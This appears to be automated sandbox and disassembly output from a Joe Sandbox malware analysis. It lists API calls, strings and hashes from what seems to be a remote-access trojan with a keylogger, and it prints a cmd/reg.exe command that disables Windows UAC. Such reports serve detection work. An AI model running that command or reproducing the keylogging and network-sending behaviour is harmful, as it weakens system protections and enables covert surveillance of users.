                                                    APIs
                                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                    • wsprintfW.USER32 ref: 0040A905
                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                    Strings
                                                    Similarity
                                                    • API ID: EventLocalTimewsprintf
                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                    • API String ID: 1497725170-248792730
                                                    • Opcode ID: ac93d5049eb4af2d3ff39b2439aaec6a6b37fc1dbf617edc53c21c1fd14495f1
                                                    • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                    • Opcode Fuzzy Hash: ac93d5049eb4af2d3ff39b2439aaec6a6b37fc1dbf617edc53c21c1fd14495f1
                                                    • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                    • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleSizeSleep
                                                    • String ID: `AG
                                                    • API String ID: 1958988193-3058481221
                                                    • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                    • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                    • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                    • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                    APIs
                                                    • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                    • GetLastError.KERNEL32 ref: 0041CAA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClassCreateErrorLastRegisterWindow
                                                    • String ID: 0$MsgWindowClass
                                                    • API String ID: 2877667751-2410386613
                                                    • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                    • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                    • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                    • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                    APIs
                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                    • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                    • CloseHandle.KERNEL32(?), ref: 00406A14
                                                    Strings
                                                    • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandle$CreateProcess
                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                    • API String ID: 2922976086-4183131282
                                                    • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                    • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                                    • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                    • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B90,0040483F,00000001,?,?,00000000,00475B90,004017F3), ref: 00404AED
                                                    • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404AF9
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404B04
                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404B0D
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                    • String ID: KeepAlive | Disabled
                                                    • API String ID: 2993684571-305739064
                                                    • Opcode ID: 2cc075cb119ee8d6e4de5a14164720dea666ca3e2be281d72593d3d64a36cd39
                                                    • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                                    • Opcode Fuzzy Hash: 2cc075cb119ee8d6e4de5a14164720dea666ca3e2be281d72593d3d64a36cd39
                                                    • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                                    APIs
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                                    • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                                    • Sleep.KERNEL32(00002710), ref: 00419F89
                                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                                    • String ID: Alarm triggered
                                                    • API String ID: 614609389-2816303416
                                                    • Opcode ID: 1ef63bee03865bcc08a608bec94dcd8ab4bbdfcd0b6f3edb2fc09791d833004d
                                                    • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                                    • Opcode Fuzzy Hash: 1ef63bee03865bcc08a608bec94dcd8ab4bbdfcd0b6f3edb2fc09791d833004d
                                                    • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                                    Strings
                                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                    • API String ID: 3024135584-2418719853
                                                    • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                    • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                    • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                    • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                    APIs
                                                      • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                    • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                    • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                    • String ID:
                                                    • API String ID: 3525466593-0
                                                    • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                    • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                    • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                    • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                    APIs
                                                      • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                      • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 4269425633-0
                                                    • Opcode ID: 122ce0d90df0b48e24d728a99b2962e5ce1622f1701a582d9c233ec2db2507e3
                                                    • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                    • Opcode Fuzzy Hash: 122ce0d90df0b48e24d728a99b2962e5ce1622f1701a582d9c233ec2db2507e3
                                                    • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                                    • _free.LIBCMT ref: 0044E1B0
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                    • String ID:
                                                    • API String ID: 336800556-0
                                                    • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                    • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                                    • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                    • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                                    APIs
                                                    • _free.LIBCMT ref: 0044F7C5
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 0044F7D7
                                                    • _free.LIBCMT ref: 0044F7E9
                                                    • _free.LIBCMT ref: 0044F7FB
                                                    • _free.LIBCMT ref: 0044F80D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                    • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                    • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                    • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                    APIs
                                                    • _free.LIBCMT ref: 00443315
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 00443327
                                                    • _free.LIBCMT ref: 0044333A
                                                    • _free.LIBCMT ref: 0044334B
                                                    • _free.LIBCMT ref: 0044335C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                    • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                                    • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                    • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Zb1Y/
                                                    • API String ID: 0-3232713500
                                                    • Opcode ID: 9e83a2b49866c0a0954c16d09c1b4fdebb0170e65fb9d01d1df359b3d0c5ec62
                                                    • Instruction ID: 5d70a4bd2d1c51a970c61982e54133d3cdb531d847138a58e970e882949b52fd
                                                    • Opcode Fuzzy Hash: 9e83a2b49866c0a0954c16d09c1b4fdebb0170e65fb9d01d1df359b3d0c5ec62
                                                    • Instruction Fuzzy Hash: 2D51E471D442099BEF21EFA5C845BAF7BB8EF05314F15041BE804A7292D7789912C76B
                                                    APIs
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                    • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                    • IsWindowVisible.USER32(?), ref: 004167A1
                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProcessWindow$Open$TextThreadVisible
                                                    • String ID: (FG
                                                    • API String ID: 3142014140-2273637114
                                                    • Opcode ID: 2df5b7247e134e06dd7043dd5c8eaa1a5c685bf3cd12a85f085cecee1c099086
                                                    • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                                    • Opcode Fuzzy Hash: 2df5b7247e134e06dd7043dd5c8eaa1a5c685bf3cd12a85f085cecee1c099086
                                                    • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                                    APIs
                                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                      • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                      • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                      • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                    • String ID: XCG$`AG$>G
                                                    • API String ID: 2334542088-2372832151
                                                    • Opcode ID: 8f018178615ad669a06aab09822f46d5c943072692d9fb390c6fa8797f9b4d49
                                                    • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                    • Opcode Fuzzy Hash: 8f018178615ad669a06aab09822f46d5c943072692d9fb390c6fa8797f9b4d49
                                                    • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                    APIs
                                                    • _free.LIBCMT ref: 00451D40
                                                      • Part of subcall function 00451B30: __alloca_probe_16.LIBCMT ref: 00451B99
                                                      • Part of subcall function 00451B30: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00451BF6
                                                      • Part of subcall function 00451B30: __freea.LIBCMT ref: 00451BFF
                                                    • _free.LIBCMT ref: 00451C96
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00451CD1
                                                      • Part of subcall function 00448716: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448757
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorHeapLast_free$AllocateByteCharFreeMultiWide__alloca_probe_16__freea
                                                    • String ID: Zb1Y/
                                                    • API String ID: 2017883074-3232713500
                                                    • Opcode ID: fa74662142cd5858ff4d6864a187426225f9c372d33f4ac9e114e584781b7c87
                                                    • Instruction ID: 37ba5a20be2cd8d2b4f9ef08766fb7ac36f70a10c850ae4c02dc24b9b3ca764f
                                                    • Opcode Fuzzy Hash: fa74662142cd5858ff4d6864a187426225f9c372d33f4ac9e114e584781b7c87
                                                    • Instruction Fuzzy Hash: 0041D231900129AADF219F268C41F9B7BB9EF45311F10449BFC08E7252EA39DD588F69
                                                    APIs
                                                    • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID: $Zb1Y/$vD
                                                    • API String ID: 1807457897-679683684
                                                    • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                    • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                    • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                    • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\eaJOpx.exe,00000104), ref: 00442724
                                                    • _free.LIBCMT ref: 004427EF
                                                    • _free.LIBCMT ref: 004427F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                    • API String ID: 2506810119-3086101319
                                                    • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                    • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                                    • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                    • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,0044A895,?,00000000,00000000), ref: 0044A5E9
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0044A895,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9D4,?), ref: 0044A617
                                                    • GetLastError.KERNEL32(?,0044A895,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9D4,?,00475B90,?,?,00000000,?), ref: 0044A648
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                    • String ID: Zb1Y/
                                                    • API String ID: 2456169464-3232713500
                                                    • Opcode ID: 17e9bdea2327856549b2d729a69f54a5a03eaa222f3bcd74165b36d2deefc3ff
                                                    • Instruction ID: d61c62bb4eb343eb36fdac958b1af53ef8a98a660c93d19da5ef6d7f77850f1b
                                                    • Opcode Fuzzy Hash: 17e9bdea2327856549b2d729a69f54a5a03eaa222f3bcd74165b36d2deefc3ff
                                                    • Instruction Fuzzy Hash: 85319071A00219AFDB24CF59DD819EAB7B8EF08315F0544BEE90AD7250D630EE90CF69
                                                    APIs
                                                    • __alloca_probe_16.LIBCMT ref: 00451B99
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00451BF6
                                                    • __freea.LIBCMT ref: 00451BFF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__alloca_probe_16__freea
                                                    • String ID: Zb1Y/
                                                    • API String ID: 3062693170-3232713500
                                                    • Opcode ID: 613b976a2355cf4f4ba5ba8ffc7bdff0db3c2b567fd9e0d752e7206116cd8565
                                                    • Instruction ID: 52486ba57724fbc470e22a27d2e0df35c3603d2851d13dbef110add20b363999
                                                    • Opcode Fuzzy Hash: 613b976a2355cf4f4ba5ba8ffc7bdff0db3c2b567fd9e0d752e7206116cd8565
                                                    • Instruction Fuzzy Hash: 97314832A00156ABDB208F65CC45EAFBBA5DF40325F14466AFC14CB291EB38DC84C798
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                      • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
